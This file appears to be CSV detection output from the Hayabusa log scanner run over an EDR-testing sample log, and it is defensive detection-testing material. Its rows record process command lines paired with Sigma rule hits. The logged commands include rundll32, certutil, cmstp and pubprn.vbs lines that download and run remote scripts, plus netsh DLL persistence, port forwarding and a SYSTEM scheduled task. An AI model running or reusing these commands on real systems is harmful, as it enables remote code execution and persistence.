netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 